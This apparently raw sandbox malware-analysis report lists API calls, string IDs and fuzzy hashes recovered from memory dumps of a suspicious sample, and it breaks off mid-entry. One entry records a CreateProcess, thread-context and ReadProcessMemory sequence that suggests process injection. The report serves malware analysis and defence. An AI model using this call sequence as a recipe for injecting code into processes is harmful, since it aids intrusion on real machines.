                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _wcscat$FileModuleNameOpen
                                                        • String ID: \$\Include\
                                                        • API String ID: 3592542968-2640467822
                                                        • Opcode ID: 617b25789c5c2f1b20a7756585449e872836bc99ac0d0ce66e5a41015d4a5f67
                                                        • Instruction ID: d151a43688af084a52d74ef0a10ce59c342a3f9ddd34dca53797f3b378a5b68b
                                                        • Opcode Fuzzy Hash: 617b25789c5c2f1b20a7756585449e872836bc99ac0d0ce66e5a41015d4a5f67
                                                        • Instruction Fuzzy Hash: 0551A5714043449FC754EF55FD8999BB3F8FF99300B40692EF649A32A1EB709608DB62
                                                        APIs
                                                        • _memset.LIBCMT ref: 00EB3725
                                                        • GetOpenFileNameW.COMDLG32 ref: 00EB376F
                                                          • Part of subcall function 00E4660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E453B1,?,?,00E461FF,?,00000000,00000001,00000000), ref: 00E4662F
                                                          • Part of subcall function 00E440A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E440C6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                        • String ID: X$t3
                                                        • API String ID: 3777226403-2341782549
                                                        • Opcode ID: 3a15e6e9b5c39ec184c7e851a6c990f3f6d2351b8f7dae890c79ec06abded4fe
                                                        • Instruction ID: 21625b3d6ab4640576b5c035548bdc9ed4b0a49b2027a3c0e22317d1762258b0
                                                        • Opcode Fuzzy Hash: 3a15e6e9b5c39ec184c7e851a6c990f3f6d2351b8f7dae890c79ec06abded4fe
                                                        • Instruction Fuzzy Hash: CE21D8B1A00198AFCF01DFA8D806BEE7BF99F89304F005059E504B7281DBB45A898F61
                                                        APIs
                                                        • __getstream.LIBCMT ref: 00E634FE
                                                          • Part of subcall function 00E67C0E: __getptd_noexit.LIBCMT ref: 00E67C0E
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E63539
                                                        • __wopenfile.LIBCMT ref: 00E63549
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                        • String ID: <G
                                                        • API String ID: 1820251861-2138716496
                                                        • Opcode ID: f24fa01d1dcb66ce28f6dfe80888cc1d4a3839dff7a5cfb39c8254b6a842b009
                                                        • Instruction ID: d1e1e3ca784427e8ede43d49daed6e0ecdd90b70cdccda46f7bdd2c1d1d5ed5f
                                                        • Opcode Fuzzy Hash: f24fa01d1dcb66ce28f6dfe80888cc1d4a3839dff7a5cfb39c8254b6a842b009
                                                        • Instruction Fuzzy Hash: 55110A70AC03069BDB11BF70BC4266EB7E4AF053D4B14A425E425FB281EF30CA0197A1
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E5D28B,SwapMouseButtons,00000004,?), ref: 00E5D2BC
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E5D28B,SwapMouseButtons,00000004,?,?,?,?,00E5C865), ref: 00E5D2DD
                                                        • RegCloseKey.KERNELBASE(00000000,?,?,00E5D28B,SwapMouseButtons,00000004,?,?,?,?,00E5C865), ref: 00E5D2FF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 3677997916-824357125
                                                        • Opcode ID: d6fadf917d83be3628023fd33b021a8fd78d57d0616532cb0dacffec0875c986
                                                        • Instruction ID: 5c0793e26f68dcee0359bdff6acdc9eba56963a0a22d2255335c62d4ed776c1a
                                                        • Opcode Fuzzy Hash: d6fadf917d83be3628023fd33b021a8fd78d57d0616532cb0dacffec0875c986
                                                        • Instruction Fuzzy Hash: 0D117C75619209FFDB208FA8CC85EEF7BB8EF04745F005829E805E7120D6329E499B60
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00BC2E5B
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00BC2EF1
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00BC2F13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086577656.0000000000BC1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BC1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_bc1000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                        • Instruction ID: 42077239147d32b1977df1e2203582c0ff5326ea4109c748b951bd2c600c3405
                                                        • Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                        • Instruction Fuzzy Hash: F162FB30A14258DBEB24CFA4C851BDEB7B6EF58700F1091A9D10DEB390E7759E81CB59
                                                        APIs
                                                          • Part of subcall function 00E44517: _fseek.LIBCMT ref: 00E4452F
                                                          • Part of subcall function 00E8C56D: _wcscmp.LIBCMT ref: 00E8C65D
                                                          • Part of subcall function 00E8C56D: _wcscmp.LIBCMT ref: 00E8C670
                                                        • _free.LIBCMT ref: 00E8C4DD
                                                        • _free.LIBCMT ref: 00E8C4E4
                                                        • _free.LIBCMT ref: 00E8C54F
                                                          • Part of subcall function 00E61C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00E67A85), ref: 00E61CB1
                                                          • Part of subcall function 00E61C9D: GetLastError.KERNEL32(00000000,?,00E67A85), ref: 00E61CC3
                                                        • _free.LIBCMT ref: 00E8C557
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                        • String ID:
                                                        • API String ID: 1552873950-0
                                                        • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                        • Instruction ID: 5e241022594480688533fa107c3557bee58cb4dfbc6211bff6eae557a43e163f
                                                        • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                        • Instruction Fuzzy Hash: 59513EB1A04218AFDF159F64DC81BADBBB9EF48314F10149EB25DB3281DB715A808F59
                                                        APIs
                                                        • _memset.LIBCMT ref: 00E5EBB2
                                                          • Part of subcall function 00E451AF: _memset.LIBCMT ref: 00E4522F
                                                          • Part of subcall function 00E451AF: _wcscpy.LIBCMT ref: 00E45283
                                                          • Part of subcall function 00E451AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E45293
                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00E5EC07
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E5EC16
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EB3C88
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                        • String ID:
                                                        • API String ID: 1378193009-0
                                                        • Opcode ID: aa2d1919eb30832292678baa6eb80de43b83dc1379b35c9c413d77a9a21c23ae
                                                        • Instruction ID: cffb631d676aeefc0d6625204b380b4a5c219234b925ee0ca3e1d21d91dc44ba
                                                        • Opcode Fuzzy Hash: aa2d1919eb30832292678baa6eb80de43b83dc1379b35c9c413d77a9a21c23ae
                                                        • Instruction Fuzzy Hash: 0F21F5705047949FE7368B788C5ABEBFFECAB01308F04149DE69E76242C3716A888B11
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00E8C72F
                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E8C746
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Temp$FileNamePath
                                                        • String ID: aut
                                                        • API String ID: 3285503233-3010740371
                                                        • Opcode ID: 79ecdae33796489d56ab6988c3dfa1fedd920b2a565a6a91b75c382a4ab3cc24
                                                        • Instruction ID: 80f6163d1d73925133e8b97240750f11b95834e91d9f2a989787f250b991a712
                                                        • Opcode Fuzzy Hash: 79ecdae33796489d56ab6988c3dfa1fedd920b2a565a6a91b75c382a4ab3cc24
                                                        • Instruction Fuzzy Hash: 9ED05E7150030EAFDB10ABA0DC0EF9AB76CD700704F0001B07750B51B2DAB2E69A8B54
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 62787560740c559b44b835a8368cbb87971aeaf31aecb60505342dc3f3be0e65
                                                        • Instruction ID: 0ffe7c654817240015aaad87a58376d3ec859f1a5d8f9fcd90ff84a7d241f984
                                                        • Opcode Fuzzy Hash: 62787560740c559b44b835a8368cbb87971aeaf31aecb60505342dc3f3be0e65
                                                        • Instruction Fuzzy Hash: B7F159716083019FCB10DF24C885B5EB7E5FF89314F14996EF999AB292DB31E905CB82
                                                        APIs
                                                        • _memset.LIBCMT ref: 00E45022
                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E450CB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell__memset
                                                        • String ID:
                                                        • API String ID: 928536360-0
                                                        • Opcode ID: 8fdd48ea147bc85df8fd3caf166c65466e7dee672b20b4da931f3411ea80efcf
                                                        • Instruction ID: 229e1c3ae2f42d4ea5aac8935acca1cffd4ba88df00fbff872d76a565c2b1942
                                                        • Opcode Fuzzy Hash: 8fdd48ea147bc85df8fd3caf166c65466e7dee672b20b4da931f3411ea80efcf
                                                        • Instruction Fuzzy Hash: 71318FB5504705CFD725DF24E84569BBBE8FF48308F00092EE69E93242E771A948CB92
                                                        APIs
                                                        • __FF_MSGBANNER.LIBCMT ref: 00E63973
                                                          • Part of subcall function 00E681C2: __NMSG_WRITE.LIBCMT ref: 00E681E9
                                                          • Part of subcall function 00E681C2: __NMSG_WRITE.LIBCMT ref: 00E681F3
                                                        • __NMSG_WRITE.LIBCMT ref: 00E6397A
                                                          • Part of subcall function 00E6821F: GetModuleFileNameW.KERNEL32(00000000,00F00312,00000104,00000000,00000001,00000000), ref: 00E682B1
                                                          • Part of subcall function 00E6821F: ___crtMessageBoxW.LIBCMT ref: 00E6835F
                                                          • Part of subcall function 00E61145: ___crtCorExitProcess.LIBCMT ref: 00E6114B
                                                          • Part of subcall function 00E61145: ExitProcess.KERNEL32 ref: 00E61154
                                                          • Part of subcall function 00E67C0E: __getptd_noexit.LIBCMT ref: 00E67C0E
                                                        • RtlAllocateHeap.NTDLL(009B0000,00000000,00000001,00000001,00000000,?,?,00E5F507,?,0000000E), ref: 00E6399F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1372826849-0
                                                        • Opcode ID: 97af98a68a413c9667ed971743ed1ba52e90d176467aace6e799244e9961b53d
                                                        • Instruction ID: 38c18994c31d1d20ee72d8debba2559eb92da72d1c5af8e13b46fbbb16aaecaf
                                                        • Opcode Fuzzy Hash: 97af98a68a413c9667ed971743ed1ba52e90d176467aace6e799244e9961b53d
                                                        • Instruction Fuzzy Hash: D601D6312C56119AE6123B35FC42B6A73989FC67E8F242125F501B7296DEB19D004B60
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00E8C385,?,?,?,?,?,00000004), ref: 00E8C6F2
                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00E8C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00E8C708
                                                        • CloseHandle.KERNEL32(00000000,?,00E8C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E8C70F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleTime
                                                        • String ID:
                                                        • API String ID: 3397143404-0
                                                        • Opcode ID: 49efec38475881f585b17179a8e4438e51f418ec4e717c562c35f987718fea62
                                                        • Instruction ID: 13c9f08a01bf1b1dd7913d27eaca39c207b35a3c26033ae8c66a3d44c0a2919b
                                                        • Opcode Fuzzy Hash: 49efec38475881f585b17179a8e4438e51f418ec4e717c562c35f987718fea62
                                                        • Instruction Fuzzy Hash: DEE08632145224BBD7212B55AC0DFCA7B18AB45760F144131FB28790E097B325168798
                                                        APIs
                                                        • _free.LIBCMT ref: 00E8BB72
                                                          • Part of subcall function 00E61C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00E67A85), ref: 00E61CB1
                                                          • Part of subcall function 00E61C9D: GetLastError.KERNEL32(00000000,?,00E67A85), ref: 00E61CC3
                                                        • _free.LIBCMT ref: 00E8BB83
                                                        • _free.LIBCMT ref: 00E8BB95
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                        • Instruction ID: 04cb16214443ce0a8114a7723070ee15b374cd446bddff5dd90222915ae2c28f
                                                        • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                        • Instruction Fuzzy Hash: 37E012A168174147DA2875797E44EB763CC4F043957182C5DB45DF7146DF24E84086A8
                                                        APIs
                                                          • Part of subcall function 00E422A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E424F1), ref: 00E42303
                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E425A1
                                                        • CoInitialize.OLE32(00000000), ref: 00E42618
                                                        • CloseHandle.KERNEL32(00000000), ref: 00EB503A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                        • String ID:
                                                        • API String ID: 3815369404-0
                                                        • Opcode ID: ac9e6f265fdf35f27b19ccbf21c2d27348377f083d1db15ef804e064140ad208
                                                        • Instruction ID: 4b2e6dbd915a75c24ec4944ce9303b36eabb6c26e332391e683bd0b6e1eef7eb
                                                        • Opcode Fuzzy Hash: ac9e6f265fdf35f27b19ccbf21c2d27348377f083d1db15ef804e064140ad208
                                                        • Instruction Fuzzy Hash: 2D71BDB490138D8FC718EF6AAD954A5BBE5FB99344784526EE209DB3B2CB304404FF15
                                                        APIs
                                                        • _strcat.LIBCMT ref: 00EA08FD
                                                          • Part of subcall function 00E4936C: __swprintf.LIBCMT ref: 00E493AB
                                                          • Part of subcall function 00E4936C: __itow.LIBCMT ref: 00E493DF
                                                        • _wcscpy.LIBCMT ref: 00EA098C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: __itow__swprintf_strcat_wcscpy
                                                        • String ID:
                                                        • API String ID: 1012013722-0
                                                        • Opcode ID: beb58ca3c0a89047afed0d519a673df830afdec3276446b1e097a1bef010c4e6
                                                        • Instruction ID: 7a7e9facb752928956516bf0858221b9d39885f9ed9f3352ba028a00a2637cdb
                                                        • Opcode Fuzzy Hash: beb58ca3c0a89047afed0d519a673df830afdec3276446b1e097a1bef010c4e6
                                                        • Instruction Fuzzy Hash: 9D913A34A00604DFCB28DF28D4919A9B7E5FF4A314B519469E81AAF3A2DB30FD41CF81
                                                        APIs
                                                        • IsThemeActive.UXTHEME ref: 00E43A73
                                                          • Part of subcall function 00E61405: __lock.LIBCMT ref: 00E6140B
                                                          • Part of subcall function 00E43ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E43AF3
                                                          • Part of subcall function 00E43ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E43B08
                                                          • Part of subcall function 00E43D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00E43AA3,?), ref: 00E43D45
                                                          • Part of subcall function 00E43D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00E43AA3,?), ref: 00E43D57
                                                          • Part of subcall function 00E43D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F01148,00F01130,?,?,?,?,00E43AA3,?), ref: 00E43DC8
                                                          • Part of subcall function 00E43D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00E43AA3,?), ref: 00E43E48
                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E43AB3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                        • String ID:
                                                        • API String ID: 924797094-0
                                                        • Opcode ID: ac886b538a8fc78b7d7de39b7e9403ddc0a34dd8704c81b990d83cea7f6da8d9
                                                        • Instruction ID: 472fe21eda5290400de117b9a6ed2f26c5eda394b68183649f0867e63e3d360d
                                                        • Opcode Fuzzy Hash: ac886b538a8fc78b7d7de39b7e9403ddc0a34dd8704c81b990d83cea7f6da8d9
                                                        • Instruction Fuzzy Hash: 0811AC719083449FC300EF29EC4590AFBE9FB94350F00891FF985A72A2DB709545DB92
                                                        APIs
                                                        • ___lock_fhandle.LIBCMT ref: 00E6EA29
                                                        • __close_nolock.LIBCMT ref: 00E6EA42
                                                          • Part of subcall function 00E67BDA: __getptd_noexit.LIBCMT ref: 00E67BDA
                                                          • Part of subcall function 00E67C0E: __getptd_noexit.LIBCMT ref: 00E67C0E
                                                        Memory Dump Source
